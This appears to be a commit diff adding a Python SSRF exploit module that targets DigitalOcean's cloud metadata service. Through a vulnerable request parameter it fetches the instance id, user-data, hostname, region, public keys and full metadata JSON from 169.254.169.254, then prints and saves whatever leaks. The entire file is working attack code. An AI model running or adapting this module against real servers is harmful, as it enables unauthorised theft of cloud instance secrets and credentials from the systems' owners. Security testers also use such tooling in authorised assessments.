|
| 1 | +from utils.utils import * |
| 2 | +import logging |
| 3 | +import os |
| 4 | + |
| 5 | +name = "digitalocean" |
| 6 | +description = "Access sensitive data from the Digital Ocean provider" |
| 7 | +author = "errorfiathck" |
| 8 | +documentation = ["https://developers.digitalocean.com/documentation/metadata/"] |
| 9 | + |
| 10 | +class exploit(): |
| 11 | + endpoints = set() |
| 12 | + |
| 13 | + def __init__(self, requester, args): |
| 14 | + logging.info(f"Module '{name}' launched !") |
| 15 | + self.add_endpoints() |
| 16 | + |
| 17 | + r = requester.do_request(args.param, "") |
| 18 | + if r != None: |
| 19 | + default = r.text |
| 20 | + |
| 21 | + directory = requester.host |
| 22 | + |
| 23 | + directory = directory.replace(':','_') |
| 24 | + if not os.path.exists(directory): |
| 25 | + os.makedirs(directory) |
| 26 | + |
| 27 | + for endpoint in self.endpoints: |
| 28 | + payload = wrapper_http(endpoint[1], endpoint[0] , "80") |
| 29 | + r = requester.do_request(args.param, payload) |
| 30 | + diff = diff_text(r.text, default) |
| 31 | + if diff != "": |
| 32 | + |
| 33 | + # Display diff between default and ssrf request |
| 34 | + logging.info(f"\033[32mReading file\033[0m : {payload}") |
| 35 | + print(diff) |
| 36 | + |
| 37 | + # Write diff to a file |
| 38 | + filename = endpoint[1].split('/')[-1] |
| 39 | + logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}") |
| 40 | + with open(directory + "/" + filename, 'w') as f: |
| 41 | + f.write(diff) |
| 42 | + |
| 43 | + |
| 44 | + def add_endpoints(self): |
| 45 | + self.endpoints.add( ("169.254.169.254","metadata/v1/id") ) |
| 46 | + self.endpoints.add( ("169.254.169.254","metadata/v1/user-data") ) |
| 47 | + self.endpoints.add( ("169.254.169.254","metadata/v1/hostname") ) |
| 48 | + self.endpoints.add( ("169.254.169.254","metadata/v1/region") ) |
| 49 | + self.endpoints.add( ("169.254.169.254","metadata/v1/public-keys") ) |
| 50 | + self.endpoints.add( ("169.254.169.254","metadata/v1.json") ) |
0 commit comments